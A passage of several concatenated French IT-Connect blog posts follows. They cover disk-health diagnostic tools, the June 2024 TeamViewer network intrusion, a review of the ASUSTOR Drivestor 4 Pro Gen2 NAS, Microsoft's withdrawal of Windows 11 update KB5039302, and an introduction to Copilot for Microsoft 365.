Dell, par exemple, propose l’outil ePSA (Enhanced Pre-Boot System Assessment) intégré à son BIOS/UEFI et qui est utilisé pour effectuer un diagnostic manuel complet des éléments de ses ordinateurs (carte mère, RAM, lecteur DVD, disque dur, etc.) et naturellement, renvoyer un message en cas d’erreur ou pas. Il peut aussi bien évidemment être configuré pour se lancer automatiquement au démarrage.

Une fois le test effectué, il ne reste plus qu’à récupérer les informations relatives au test et aller les comparer en ligne.

Voici en dessous quelques liens vers des tableaux de référence pouvant justement aider à donner des informations relatives aux codes générés par les tests ePSA.

D’autres fabricants d’ordinateurs propose aussi de tels services, il suffit juste de rechercher des informations sur le fabricant de votre ordinateur.

B. L'outil SeaTools de Seagate

Des fabricants de disques peuvent aussi fournir des utilitaires pour effectuer des tests de disques. Seagate, par exemple, a mis sur pied l'outil de diagnostic gratuit  "SeaTools" s’appuyant sur la technologie S.M.A.R.T. Il reconnait la quasi-totalité des supports connectés (USB, S/PATA, SCSI, etc.) au système à partir duquel il est exécuté et ceci indépendamment du constructeur. Il est disponible pour les systèmes Windows et Linux. Cependant, il ne fournira pas d’informations on ne peut plus complète que sur ses propres produits à lui (Seagate).

Ces derniers offrent également des fonctionnalités supplémentaires telles que la mise à jour du firmware des disques, la création et le formatage des partitions de disques, réparation des partitions, etc.

Etat du disque Seagate avec SeaTools

Une version entreprise est bien évidemment disponible uniquement pour des disques Seagate et connectés en SCSI et en Fibre Channel conçus pour des serveurs et autres postes de travail. Ceci ajoute la prise en charge les tests de plusieurs lecteurs simultanément ainsi que séquentiellement.

Pour obtenir plus d'informations sur l'outil SeaTools, ou le télécharger, vous pouvez consulter le site officiel :

C. L'outil Western Digital Dashboard

Western Digital fournit aussi un utilitaire similaire à SeaTools. Il est appelé « Western Digital Dashboard ». À la différence de SeaTools, il gère très bien ses propres produits et est un peu moins ouvert aux fabricants tiers (simple détection de disques connectés et pas assez d’informations sur ces derniers). Il est uniquement disponible sous Windows.

Etat du disque Western Digital

Pour obtenir plus d'informations sur l'outil Western Digital Dashboard, ou le télécharger, vous pouvez consulter le site officiel :

V. Conclusion

Nous venons d’énumérer un ensemble de méthodes utiles pour connaître l’état de santé d’un disque, chacune selon sa technologie et son mode de fonctionnement. Ces actions sont le plus souvent très bénéfiques dans le cadre de la maintenance préventive et le suivi d’un système informatique, ou lorsque vous avez un doute avec un disque. Le fait d'anticiper une panne pourra vous permettre de vous prémunir contre une perte de données et une interruption de service inattendue.

De plus, pensez à créer des sauvegardes régulières de vos données, sans attendre la moindre alerte de panne ; une partition défectueuse est souvent précédée d’un défaut physique (secteurs touchés) sur le disque que les outils logiques ne peuvent corriger.

Dans le cas d’une chute ou d’un choc de disque, par exemple, vous pouvez vous servir de l’utilitaire TestDisk pour extraire vos données au cas où la ou les partition(s) sont passées sous RAW. Il sera utile dans ce cas présent et les outils cités dans cet article ne pourront pas vous aider.

Si vous connaissez d’autres outils pouvant aider dans ce sens, n’hésitez pas à commenter cet article.

The post Windows : comment connaître l’état de santé de son disque dur ou disque SSD ? first appeared on IT-Connect.

Cyberattaque chez TeamViewer : des pirates ont pu accéder au réseau de l’entreprise !

Le 26 juin 2024, une intrusion a été détectée sur le réseau informatique de l'entreprise TeamViewer, reconnue mondialement pour sa solution de prise en main à distance. Voici ce qu'il faut savoir sur cette cyberattaque.

Pour rappel, TeamViewer est une solution de prise en main à distance très utilisée par les particuliers et les organisations. Présent dans le monde entier, TeamViewer compte aujourd'hui 640 000 clients et a été installé sur plus de 2,5 milliards d'appareils depuis son lancement.

Le mercredi 26 juin 2024, l'équipe de sécurité de TeamViewer a détecté une activité anormale et suspecte au sein de l'infrastructure informatique interne de TeamViewer. Suite à cette intrusion, TeamViewer semble avoir réagi très rapidement : "Nous avons immédiatement sollicité notre équipe de réponses à incident, entamé des enquêtes avec une équipe d'experts en cybersécurité de renommée mondiale et mis en œuvre les mesures correctives nécessaires.", peut-on lire dans le communiqué. Pour le moment, très peu d'informations ont été partagées par TeamViewer.

Les pirates ont-ils eu accès à l'infrastructure utilisée par la solution TeamViewer ? Et, potentiellement, ont-ils pu accéder à des données de clients ? TeamViewer étant une solution de prise en main à distance, il est logique de se poser ces questions.

TeamViewer tient à rassurer ses clients à ce sujet. Voici ce que l'on peut lire dans le communiqué : "L'environnement informatique interne de TeamViewer est totalement indépendant de l'environnement du produit. Rien n'indique que l'environnement du produit ou les données des clients soient affectés. Les investigations sont en cours et notre objectif principal reste de garantir l'intégrité de nos systèmes." - Néanmoins, la situation est à suivre de près, car s'il y a eu une intrusion sur l'infrastructure de la solution TeamViewer en elle-même, cela pourrait être lourd de conséquences.

D'après la communauté Health-ISAC, le groupe de cybercriminels russes APT29, également connu sous les noms de Cozy Bear, NOBELIUM et Midnight Blizzard, pourrait être à l'origine de cette cyberattaque. Cette information reste à vérifier. De son côté, TeamViewer s'est engagé à être transparent au fur et à mesure que l'enquête avance.

Source

The post Cyberattaque chez TeamViewer : des pirates ont pu accéder au réseau de l’entreprise ! first appeared on IT-Connect.

NAS – Test ASUSTOR Drivestor 4 Pro Gen2 (AS3304T V2)

I. Présentation

Le NAS ASUSTOR AS3304T V2 alias Drivestor 4 Pro Gen2 est un modèle abordable avec 4 baies de disques et une configuration suffisante pour tous les amoureux de multimédias. Il s'adresse principalement aux particuliers, pour un usage personnel.

Précédemment, nous avons eu l'occasion de tester d'autres modèles de chez ASUSTOR, notamment le Nimbustor 4 Gen2 et le Lockerstor 4 Gen2. D'ailleurs, vous devriez vous intéresser à ces modèles si vous recherchez un NAS avec emplacement M.2 pour SSD. Le modèle présenté aujourd'hui n'en a pas.

Donc, pour faire connaissance avec ce nouveau modèle, qui est le successeur de la première génération (AS3304T), commençons par la liste de ses caractéristiques.

  • CPU : Realtek RTD1619B @ 1,7 GHz - Quatre cœurs - Architecture ARM
  • RAM : 2 Go SO-DIMM DDR4 (non extensible)
  • Baies de disque : 4 baies pour disques 3,5" ou 2,5" - Enfichable à chaud - Disques durs ou SSD
  • Interfaces réseau : 1 x 2,5 Gbit/s (RJ45)
  • Sortie USB : 3 x USB 3.2 Gen 1 (10 Gbps) dont un à l'avant
  • Ventilateur : 120 mm
  • Alimentation externe : 90 Watts
  • Poids : 2,2 Kg
  • Garantie : 3 ans

Vous pouvez obtenir plus d'informations sur le site officiel ASUSTOR.

Puisqu'il s'agit du Drivestor 4 Pro de seconde génération, il me semble important d'évoquer les évolutions avec ce nouveau modèle.

Visuellement, ces deux modèles sont identiques puisque le même boitier est utilisé pour les deux NAS. La différence se situe au niveau du matériel, sous le capot donc !

  • Le processeur Realtek RTD1296 est remplacé par le Realtek RTD1619B (fréquence plus élevée).
  • Les deux modèles sont livrés avec 2 Go de RAM.
  • La connectique est strictement identique entre les deux modèles.

Finalement, ces deux modèles sont vraiment très proches, puisque la seule évolution, c'est le CPU ! Néanmoins, cette mise à niveau était nécessaire puisque la puce Realtek RTD1296 date de 2016. Celle utilisée sur la version présentée dans cet article est sortie début 2023. Une évolution importante, tout de même.

II. Déballage, design et montage

ASUSTOR nous a habitué à proposer un packaging soigné. Ce nouveau modèle en bénéficie également puisque la boite met bien en avant les caractéristiques principales du NAS, tout en donnant un aperçu sur son visuel.

Dans la boite, il y a un petit carton avec l'ensemble des accessoires, ainsi que le NAS bien calé dans des blocs de mousse et emballé dans un plastique. La façade brillante est également protégée par un film protecteur supplémentaire (utile pour lutter contre les micro-rayures). Tout est fait pour que le matériel ne soit pas endommagé pendant le transport.

Le panel d'accessoires habituel chez ASUSTOR accompagne le NAS, à savoir un guide d'installation rapide, une alimentation externe et le câble adéquat, ainsi qu'un câble Ethernet RJ45 et des vis.

Le châssis du NAS est entièrement en métal. La présence de plastique se limite à la partie gauche de la façade et à la coque amovible de la façade. Ce modèle est équipé de la façade amovible et brillante déjà présente sur d'autres modèles de la marque, ainsi que du boitier noir taillé en forme de diamant ! La façade amovible contient l'inscription "ASUSTOR", de couleur bronze.

À l'arrière, l'utilisateur peut accéder à deux ports USB et à l'interface réseau RJ45 en 2.5 GbE. Difficile de manquer l'imposant ventilateur de 120 mm. Nous pouvons noter l'absence d'un port HDMI, pourtant bien présent sur d'autres modèles. C'est dommage, car le port HDMI permet de bénéficier de l'application ASUSTOR Portal appréciable pour les usages personnels.

ASUSTOR a pris soin d'intégrer une série de LED sur la gauche du boitier pour indiquer l'état et l'activité des disques, du réseau et de l'USB. Ceci est pratique pour connaître l'état du NAS en un coup d'œil. Autre élément pratique : le port USB présent en façade, accompagné par un bouton d'action pour la sauvegarde "One Touch". Vous connectez votre disque externe USB, vous appuyez sur le bouton, et hop les données du NAS sont sauvegardées sur le disque externe, ou inversement.

Le fait de retirer la façade amovible et maintenue par 4 aimants donne accès aux baies de disques du NAS.

La première étape avant d'allumer le NAS, c'est d'insérer les disques dans le boitier. Ce modèle n'a pas d'emplacement pour disque SSD NVMe. L'installation des disques s'effectue sans outil grâce à un système de clips présent sur le côté de chaque baie de disque. Mais, alors, à quoi servent les vis ? Elles sont réservées aux disques 2,5 pouces, mais vous n'en aurez pas besoin avec les disques 3,5 pouces.

Installation du disque dur dans le rack

L'ouverture du boitier n'est pas utile puisqu'il n'y a pas d'extension possible pour la RAM. Néanmoins, voici deux photos pour vous permettre de visualiser la conception de celui-ci.

III. Le système d’exploitation ADM

A. Initialisation du NAS

Disposer d'un ordinateur pour initialiser et configurer son NAS ASUSTOR, ce n'est pas nécessaire ! ASUSTOR propose un ensemble d'applications pour initialiser, utiliser et configurer son NAS depuis un appareil mobile, bien que ce soit plus limité qu'à partir d'un navigateur sur un PC.

Pour effectuer la mise en marche depuis un mobile, l'application mobile AiMaster doit être utilisée. ASUSTOR propose d'autres applications mobiles dont AiData, AiFoto 3, AiDownload, AiMusic, etc... pour répondre à différents besoins, telles que la gestion des photos, de la musique, des téléchargements, etc.

Pour cette fois-ci, l'application de bureau Asustor Control Center depuis Windows sera utilisée. Elle sert notamment à détecter la présence d'un NAS sur le réseau. Le nouveau NAS, avec le statut "Non initialisé" a bien été repéré. Il convient de cliquer sur ce bouton rouge pour accéder à l'interface du NAS.

La mise en route s'effectue en quelques clics. Deux chemins sont cependant accessibles à l'utilisateur : une configuration rapide et guidée pour les débutants, et une configuration personnalisée pour les utilisateurs avertis. La méthode illustrée ci-dessous est celle baptisée "1-Clic", où la mise en route est simplifiée. L'ensemble des choix à effectuer pour initialiser le NAS sont regroupés sur une seule page.

Patientez environ 5 minutes est le NAS est prêt !

Par la suite, l'application AiMaster peut vous accompagner au quotidien pour effectuer quelques tâches d'administration de base et surveiller l'activité sur votre NAS. à utiliser selon vos besoins.

Sachez que ce modèle supporte plusieurs modes de stockage : RAID 0, RAID 1, RAID 5, RAID 6, RAID 10 ainsi que le mode JBOD. Ma configuration étant basée sur 3 disques, un volume RAID-5 monté en Btrfs est créé. Le disque NVMe sera utilisé pour le cache, dans un second temps.

Je vous recommande d'utiliser le système de fichiers Btrfs pour pouvoir créer des clichés instantanés de votre volume. C'est un atout majeur en comparaison de l'EXT4 qui ne supporte pas cette fonctionnalité.

B. Découverte du système ADM

Lors de la première connexion au NAS, l'utilisateur est invité à lire quelques conseils liés à la sécurité de l'appareil. A juste titre, ASUSTOR vous recommande de ne pas utiliser les numéros de ports par défaut pour l'accès au NAS.

Une fois cette étape passée, un tutoriel interactif apparaît à l'écran ! Il est là pour vous accompagner et vous aider à prendre en main le système ADM. Les débutants apprécieront, car ce tutoriel explique comment créer un utilisateur, un dossier partagé, etc.

Ci-dessous, un aperçu global de l'interface d'ADM dans sa version 4.3.1-R6C1. C'est la version la plus récente à l'heure où ce test est rédigé (date de sortie : 12 juin 2024). ADM est un système fiable et abouti, qui bénéficie en plus d'une interface soignée et personnalisable. Sur le marché des NAS, le système ADM est une valeur sûre.

Quelles sont les nouveautés d'ADM 4.3.1 ? Au-delà de corriger des bugs, cette version ajoute la prise en charge du protocole HTTP/2 dans Web Center et Reverse Proxy. De plus, ADM prend désormais en charge la navigation dans les images HEIF, HIF, DNG et ORF. Et, ASUSTOR précise que les fichiers de configuration côté serveur peuvent désormais être importés vers le client VPN WireGuard. Voir cette page pour plus de détails.

L'utilisateur peut personnaliser la page de connexion du NAS, mais aussi son espace personnel. Il peut choisir son propre fond d'écran, modifier la disposition des éléments sur le bureau, changer les couleurs des boutons ou encore modifier le type d'icônes.

Voici une liste, non exhaustive, des fonctions natives :

  • Création de partages de fichiers, avec gestion des droits, mais aussi l’utilisation de certains protocoles (SMBv3, AFP, etc)
  • Création de comptes utilisateurs ou de groupes, avec possibilité d'associer le NAS à un serveur Active Directory / LDAP
  • Configuration du réseau (adresse IP, DNS, association de cartes réseau, création d’un serveur DHCP, etc.)
  • Configuration du pare-feu ADM Defender pour gérer les flux entrants et sortants de votre NAS (avec filtrage géographique)
  • Activer la fonctionnalité EZ-Connect pour se connecter à distance, facilement, à votre NAS à l’aide d’un nom personnalisé
  • Gestion de l’alimentation (mise en veille des disques durs, démarrer et éteindre le NAS selon un planning, vitesse du ventilateur, etc.)
  • Démarrage via le réseau, depuis le LAN (Wake on LAN), mais aussi le WAN (Wake on WAN)
  • Monitoring du système (CPU, RAM, disque, réseau, processus)
  • Gestion du stockage (espace utilisé, volumes, cible iSCSI, clichés instantanés, etc.)
  • Prise en charge de nombreux protocoles : NFS, FTP, WebDAV, SMB, SFP, AFP (MacOS), SNMP, TFTP, SFTP, etc.
  • Notifications par e-mail, SMS ou Push sur smartphone (notamment dans l'application AiMaster)
  • Configuration en tant que serveur Web (Apache, Nginx) ou reverse proxy
  • Etc...

Comme à mon habitude, je vous recommande vivement d'utiliser l'application Dr. ASUSTOR ! Elle est là pour aider l'utilisateur à sécuriser son NAS. En quelques clics, vous pouvez obtenir un état de santé de votre NAS et obtenir des recommandations pour améliorer la sécurité du NAS dans son ensemble.

C. Le magasin d'applications

Le magasin d'applications du système ADM, baptisé App Central, donne accès à un ensemble d'applications qu'il est possible d'installer sur son NAS pour ajouter des fonctionnalités supplémentaires. Il y en a pour tous les goûts, aussi pour les particuliers que les professionnels. D'ailleurs, lors du premier lancement de cette application, un assistant nous invite à choisir des applications correspondantes à un usage spécifique.

L'App Central référence plusieurs dizaines de paquets prêts à l'emploi, certains maintenus par ASUSTOR, d'autres par la communauté d'utilisateurs. Pour la maison, nous retrouvons des applications comme Plex Media Center, LooksGood, Photo Gallery ou encore AdGuard Home. Tandis que pour les pros ou les utilisateurs avertis, ASUSTOR donne accès à Docker, ainsi que Portainer, pour les conteneurs, et aussi à VirtualBox. Néanmoins, la configuration matérielle de ce NAS, et sa faible quantité de RAM, n'est pas adaptée à la virtualisation.

La version la plus récente du système, à savoir ADM 4.3, a ajouté la prise en charge du protocole WireGuard à VPN Server. Un ajout qui fera sans doute plaisir à certains d'entre vous ! WireGuard est nettement plus performant qu'OpenVPN.

Voici quelques applications disponibles dans l’App Central d’ASUSTOR :

  • Mise en place d'un centre de streaming via ASUSTOR Live (diffuser un flux vers plusieurs plateformes de streaming comme YouTube, Twitch, Facebook, etc.).
  • Mise en place de la solution de sauvegarde Nakivo Backup (une licence additionnelle est nécessaire) ou UrBackup (open source)
  • Mise en place d'un serveur de messagerie avec Mail-Server
  • Mise en place d'un serveur de centralisation des logs avec Syslog Server
  • Gestion de caméras de surveillance avec Surveillance Center
  • Externalisation de ses données en créant une sauvegarde Cloud avec Cloud Backup Center
  • Gestion des mots de passe avec Bitwarden
  • Mise en place d’un serveur applicatif Tomcat
  • Etc...

Regardons de plus près les applications LooksGood et Photo Gallery 3 développées par ASUSTOR. La première sert à gérer une bibliothèque de vidéos et la seconde vos albums photos. L'accès à ces applications s'effectue via un navigateur web ou les applications mobiles.

LooksGood permet à l'utilisateur de stocker et d'organiser ses vidéos personnelles, ainsi que des films et séries. Grâce à une synchronisation avec une base en ligne, l'application peut récupérer les métadonnées correspondantes à ces vidéos (titre, image de l'affiche, etc.). L'indexation du contenu s'effectue à partir des dossiers présents sur votre NAS : il vous suffit de charger vos vidéos dans ces répertoires et LooksGood s'occupe du reste. C'est en quelque sorte une alternative à Plex Media Server proposée par ASUSTOR.

Photo Gallery 3 permet à l'utilisateur de stocker et d'organiser ses photos, et éventuellement ses vidéos. Autrement dit, c'est une solution pour organiser vos photos souvenirs sur votre NAS. Ces photos pourront être organisées par album, par emplacement, et visualisées depuis le navigateur. C'est intéressant pour sauvegarder les photos de son smartphone sur le NAS.

D. Les applications de sauvegarde

ADM intègre des fonctions natives pour la sauvegarde, la restauration et l'archivage des données, qui pourront être étendues par les applications présentes dans l'App Central. L'application installée par défaut sur ADM s'appelle "Sauvegarde & Restauration".

L'utilisateur peut s'appuyer sur cette fonction pour sauvegarder les données du NAS vers une autre destination, ou inversement, en utilisant Rsync ou les protocoles SMB et FTP. C'est aussi par son intermédiaire que la fonction de sauvegarde "One Touch", liée au bouton et au port USB présents sur la façade du NAS, peut être configurée. Pour rappel, l'objectif est de sauvegarder des données du NAS sur un disque USB, ou à l'inverse, sauvegarder un disque USB sur le NAS.

Le service "EZ Sync" d'ADM permet de synchroniser les données entre votre ordinateur et votre NAS, comme vous pourriez le faire avec Google Drive, OneDrive, Dropbox, etc... Sauf que là les données sont stockées sur votre NAS ! Vous n'avez pas d'abonnement à payer et la seule limite de stockage, c'est celle de votre NAS ! Ici, le NAS est monté en RAID-5 avec 3 disques, donc si un disque est HS, les données ne seront pas perdues. Malgré tout, vous devez effectuer une sauvegarde externalisée de vos données.

Si ces applications ne répondent pas à vos besoins, sachez qu'il y a une catégorie nommée "Sauvegarde et synchronisation" dans l'App Central.

Nous pouvons, par exemple, citer l'application "Cloud Backup Center", développée par ASUSTOR, qui permet de créer une tâche de sauvegarde de ses données vers un fournisseur Cloud. Ceci est très utile pour effectuer une sauvegarde externalisée des données de son NAS. Différents fournisseurs sont pris en charge, dont Azure Blob Storage, Google Cloud Storage, Back Blaze B2, Amazon S3, etc... ainsi que les protocoles WebDAV et SFTP.

Le fait d'utiliser le système de fichiers Btrfs permet de créer des snapshots par l'intermédiaire du "Snapshot Center". Chaque snapshot correspond à une "photo" à l'instant t de vos données. Ainsi, en cas de suppression accidentelle ou d'acte malveillante, il sera possible de récupérer vos données par cet intermédiaire. De plus, ASUSTOR a intégré la possibilité de créer des clichés verrouillés, c'est-à-dire que l'utilisateur ne peut pas les supprimer de lui-même : c'est une fonction de sécurité importante. Ceci me semble faire référence à la création de snapshots immuables.

IV. Performances ASUSTOR AS3304T V2

Ce NAS est équipé par un processeur Realtek RTD1619B, donc sur une architecture ARM. Cette puce est utilisée sur différents modèles de NAS, et pas seulement chez ASUSTOR.

Pour évaluer les performances, je vais m'appuyer sur des transferts de fichiers effectués par le réseau (via le protocole SMB). Dans un premier temps, un lien réseau en 2,5 Gbit/s sera utilisé pour exploiter au maximum l'interface réseau du NAS. Puis, dans un second temps, l'interface réseau sera bridée à 1 Gbit/s pour effectuer le même test.

Pour la partie stockage, ce sont trois disques durs Seagate IronWolf 1 To (5 900 tr/min - 64 Mo de mémoire cache) montés en RAID-5 qui seront utilisés. Le système de fichiers Btrfs est utilisé. Puisque ce NAS dispose de 4 baies de disques et qu'il n'y en a que 3 utilisées, que faire de la baie de disque inutilisée ? Sachez qu'elle n'est pas perdue puisque nous pourrions l'utiliser pour effectuer de l'archivage de données sur disque via la fonction MyArchive développée par ASUSTOR.

Je vais m'appuyer sur quatre échantillons de fichiers et le protocole SMB :

  • Des très petits fichiers : 200 fichiers de 1 Mo
  • Des petits fichiers : 200 fichiers de 10 Mo
  • Des fichiers moyens : 5 fichiers de 100 Mo
  • Des gros fichiers : 5 fichiers de 1000 Mo

A. Benchmark avec connexion 1 Gbit/s

B. Benchmark avec connexion 2.5 Gbit/s

C. Le CPU et la RAM

Pendant ce temps, voici la charge CPU et RAM.

Lors du benchmark avec une connexion 1 Gbit/s, le CPU est sollicité à environ 40% pendant les phases d'écriture et à environ 30% pendant les phases de lecture. La consommation de la RAM est inférieure à 20%.

Lors du benchmark avec une connexion 2.5 Gbit/s, le CPU est sollicité à environ 75% pendant les phases d'écriture et à environ 40% pendant les phases de lecture. Là aussi, la consommation de la RAM est inférieure à 20%.

D. Mon avis sur les performances

L'interface réseau 2.5 Gbit/s permet d'exploiter pleinement les performances des disques présents dans le NAS. Le CPU, bien qu'il soit fortement sollicité lors d'un transfert réseau, tient le coup !

Les performances sont satisfaisantes pour ce NAS puisque les débits en lecture et écriture sont supérieurs à 200 Mo/s lors de l'utilisation de la connexion 2.5 GbE. C'est moins que les modèles plus haut de gamme de la marque, mais c'est cohérent pour cette configuration abordable.

Remarque : sur son site, ASUSTOR annonce un débit de 283 MB/S en lecture et 280 MB/S sur un volume en RAID-5. Il s'agit de tests effectués par ASUSTOR en condition optimale.

V. Conclusion

L'ASUSTOR Drivestor 4 Pro Gen2 s'adresse avant tout aux particuliers, même si un professionnel pourrait tout à fait l'utiliser. En effet, la présence d'ADM 4.3 offre à l'utilisateur de nombreuses fonctionnalités et ouvrent la porte à divers scénarios d'utilisation. Bien que le NAS soit limité par ses 2 Go de RAM, l'utilisateur bénéficie de fonctionnalités de sécurité très intéressante. Nous pouvons citer la dernière en date liée à ADM 4.3 : les instantanés immuables sur les volumes Btrfs.

Le Drivestor 4 Pro Gen 2 est proposé à 409.95 euros dans sa version 4 baies et 299.95 euros dans sa version 2 baies (attention le CPU diffère entre les deux versions). Même si le coût n'est pas neutre, c'est un tarif plutôt agressif vis-à-vis de la concurrence pour ce NAS efficace. À ce prix, vous avez même le droit à une interface réseau 2.5 GbE qui se démocratise chez ASUSTOR depuis plusieurs années.

Si vous désirez acheter ce NAS, vous pouvez utiliser notre lien :

👍 Avantages                                                                 

  • Un design travaillé et passe-partout
  • ADM 4.3 : support de WireGuard et les snapshots immuables (Btrfs)
  • Catalogue d'applications bien fourni, y compris pour le multimédia et la gestion de données personnelles
  • Aucun outil nécessaire pour installer les disques dans les baies
  • Garantie de 3 ans, comme les autres modèles de la marque

👎 Inconvénients

  • La RAM limitée à 2 Go, non extensible.
  • Pas de port HDMI, c'est dommage.

The post NAS – Test ASUSTOR Drivestor 4 Pro Gen2 (AS3304T V2) first appeared on IT-Connect.

Microsoft retire la mise à jour KB5039302, car elle fait redémarrer en boucle Windows 11 !

Cette semaine, Microsoft a publié la mise à jour KB5039302 pour Windows 11 avant d'arrêter sa diffusion, car elle est à l'origine de redémarrage en boucle sur certaines machines ! Faisons le point !

Le 25 juin 2024, Microsoft a publié la mise à jour KB5039302 pour son système d'exploitation Windows 11. Il s'agit d'une mise à jour optionnelle permettant d'avoir un aperçu des améliorations et des correctifs de bugs qui seront intégrés à la future mise à jour de juillet 2024. Et, visiblement, les premiers retours ne sont pas bons du tout… À tel point que Microsoft a pris la décision d'arrêter la distribution de cette mise à jour.

Sur son site, Microsoft a ajouté un nouveau problème connu pour évoquer un problème lié à cette mise à jour. Suite à l'installation de ladite mise à jour, Windows 11 redémarre en boucle et refuse de se lancer correctement !

"Après l'installation des mises à jour publiées le 26 juin 2024 (KB5039302), certains appareils peuvent ne pas démarrer. Les systèmes concernés peuvent redémarrer à plusieurs reprises et nécessiter des opérations de récupération afin de rétablir une utilisation normale.", peut-on lire sur le site de Microsoft. Windows 11 23H2 et Windows 11 22H2 sont les deux versions affectées par ce bug.

Quelles sont les machines impactées par ce bug ?

La bonne nouvelle, c'est que toutes les machines Windows 11 ne sont pas concernées et que cela affecte des configurations spécifiques. Microsoft explique que ce bug est susceptible de se produire sur les machines avec des outils de virtualisation ou basées sur des fonctionnalités de virtualisation imbriquée. L'entreprise américaine donne quelques exemples : Cloud PC, DevBox, Azure Virtual Desktop. Le service Windows 365 n'est pas directement mentionné, mais il pourrait correspondre à la mention Cloud PC.

"Les utilisateurs de l'édition Famille de Windows sont moins susceptibles de rencontrer ce problème, car la virtualisation est moins répandue dans les environnements domestiques.", peut-on lire.

Comment désinstaller la mise à jour ?

Si votre machine redémarre en boucle, elle vous mènera tout droit vers le mode de récupération de Windows 11. Cette interface permet de désinstaller la mise à jour la plus récente installée sur votre PC...

Dans ce cas, vous devez accéder à la section "Dépannage" pour aller dans les "Options avancées" afin de pouvoir cliquer sur "Désinstaller des mises à jour". Cette section très pratique vous permettra de choisir l'option "Désinstaller la dernière mise à jour qualité", en l'occurrence la KB5039302.

Il ne vous restera plus qu'à confirmer pour que Windows procède à la désinstallation de la mise à jour Windows 11 problématique. Pour le moment, c'est la seule solution disponible pour les utilisateurs.

Avez-vous constaté ce problème ?

The post Microsoft retire la mise à jour KB5039302, car elle fait redémarrer en boucle Windows 11 ! first appeared on IT-Connect.

Prise en main de l’IA « Copilot pour Microsoft 365 »

I. Présentation

L'IA générative est une révolution et elle se présente comme un véritable "game changer" pour les organisations et les particuliers. Tout va très vite dans ce domaine, et en deux ans à peine, ce secteur a connu de nombreuses évolutions. Dans cet article, nous allons explorer les fonctionnalités de Copilot pour Microsoft 365 et découvrir comment l'IA peut transformer votre manière de travailler !

Nous commencerons par évoquer les différentes versions de Microsoft Copilot, avant d'évoquer son adoption en entreprise. Puis, nous verrons comment Copilot peut être un véritable assistant au quotidien pour les utilisateurs, au travers différents exemples avec Word, Excel, ou encore PowerPoint.

Microsoft Copilot est un assistant virtuel basé sur l'intelligence artificielle qui aide à automatiser et faciliter vos tâches quotidiennes sur les applications de Microsoft 365, comme la rédaction de documents et la gestion des e-mails. Il s'agit d'une IA générative basée sur l'utilisation d'un grand modèle de langage (LLM), ce dernier étant un modèle d'apprentissage automatique.

L'infographique ci-dessous, proposée par Microsoft Research, montre bien l'engouement des utilisateurs du monde entier pour l'IA générative.

IA générative un game changer

II. Les différentes versions de Microsoft Copilot

L'IA Copilot de Microsoft ne se limite pas à une seule offre puisqu'elle est accessible aux particuliers, mais aussi aux entreprises. Au-delà des fonctionnalités et du coût financier, les offres destinées aux entreprises sont conçues de façon à ce que vos données soient protégées bien qu'elles soient accessibles à Copilot. Nous reviendrons sur ce point par la suite.

Ainsi, aujourd'hui, il y a trois offres principales pour Copilot :

  • Copilot dans sa version gratuite, accessible à partir d'un navigateur ou de l'application mobile. Tout le monde peut l'utiliser pour obtenir des informations ou créer du contenu. Actuellement, Copilot donne accès à GPT-4 Turbo dans sa version gratuite.
  • Copilot Pro, un abonnement proposé à 22,00 euros TTC par mois et par utilisateur, plutôt pour les particuliers. Il priorise les requêtes de l'utilisateur aux heures de pointe, et ajoute la prise en charge de Copilot dans les applications Microsoft 365, en version web. Pour être plus précis, il s'agit des versions web de Word, Excel, PowerPoint, OneNote et Outlook.
  • Copilot pour Microsoft 365, un abonnement proposé à 28,10 euros HT par mois et par utilisateur, avec un paiement annuel, pour les organisations. Elle donne accès à Copilot dans les versions desktop des applications Microsoft 365, ainsi qu'à Teams, et assure une protection des données de niveau entreprise.
Tarifs des abonnements Microsoft Copilot
Source : Microsoft

Il est important de préciser qu'une licence Copilot pour Microsoft 365 doit être affectée à un utilisateur, au même titre que sa licence principale (Microsoft 365 Business Standard, Microsoft 365 E3, etc.). De plus, l'utilisateur doit bénéficier d'une licence principale, à laquelle viendra s'ajouter celle pour Copilot. Autrement dit, l'utilisateur ne peut pas avoir uniquement une licence Copilot, ce qui semble assez cohérent.

Note : l'utilisateur doit avoir une licence Microsoft 365 Business Standard, Business Premium, E3, E5 ou Office 365 E3 ou E5 pour qu'il puisse bénéficier d'une licence Copilot pour Microsoft 365.

Par ailleurs, Microsoft travaille sur des services complémentaires pour Copilot. Nous pouvons citer Copilot pour la sécurité dont l'objectif est de donner accès à Copilot pour les équipes IT, au sein des portails Entra, Purview, Intune, ou encore Defender. Une tarification spéciale, basée sur le temps d'utilisation, est associée à Copilot pour la sécurité : 3,6990 € de l'heure.

III. Adopter Microsoft Copilot en entreprise

Avec Microsoft Copilot, de nombreux secteurs d'activité peuvent bénéficier des apports de l'IA, mais comment s'y prendre pour adopter Copilot en entreprise ? Une adoption réussie, c'est la clé pour avoir des utilisateurs plus créatifs, plus innovants et dont le bien-être pourrait être amélioré grâce à la présence de ce nouvel assistant.

Le distributeur Arrow propose un programme d'accompagnement complet, baptisé "Accélération et Adoption", qui a pour objectif de guider les entreprises et les utilisateurs dans cette transition vers l'utilisation de l'IA. Et surtout, de faire en sorte que ce soit une réussite.

Ce programme donne accès à un ensemble de webinaires, y compris des webinaires techniques pour évoquer l'intégration et la protection des données (préparer son tenant avant de déployer Copilot est essentiel), ainsi que des webinaires pour les utilisateurs finaux. Cette offre d'accompagnement est associée à un kit d'adoption de Copilot comprenant un ensemble d'éléments utiles (fiches de cas d'usage par fonction, plan de déploiement, des supports de formation pour une formation interne, etc.).

Arrow étant un distributeur, il s'adresse aux sociétés de services (ESN) ayant pour but de proposer une offre Copilot pour Microsoft 365 à leurs clients. Autrement dit, Arrow ne traite pas en direct avec les clients finaux.

Si vous avez un projet Copilot, vous pouvez contacter Arrow à cette adresse e-mail :

Précédemment, nous avions évoqué Arrow et sa plateforme Arrow Sphere, que je vous invite à découvrir en suivant ce lien :

IV. Comment accéder à Microsoft Copilot ?

Pour accéder à Copilot pour Microsoft 365, les utilisateurs peuvent utiliser un navigateur web, une application mobile et par la suite, il sera possible d'utiliser Windows 10 ou Windows 11. Pour ce dernier point, ce n'est pas encore officiellement disponible en Europe, pour des raisons réglementaires.

Microsoft Copilot est accessible à partir du portail Microsoft 365, ainsi que du site "copilot.microsoft.com" qui s'adresse à tous les utilisateurs (particuliers et professionnels). D'ailleurs, lors de l'accès à cette adresse, nous pouvons constater la présence d'un mode "Travail" et d'un mode "Web", ainsi que d'un bouclier vert indiquant que les données sont protégées et qu'elles ne seront pas utilisées pour entrainer le modèle.

Une interface similaire est accessible à partir de Microsoft Teams puisque Copilot est proposé en tant que conversation.

Copilot dans Teams

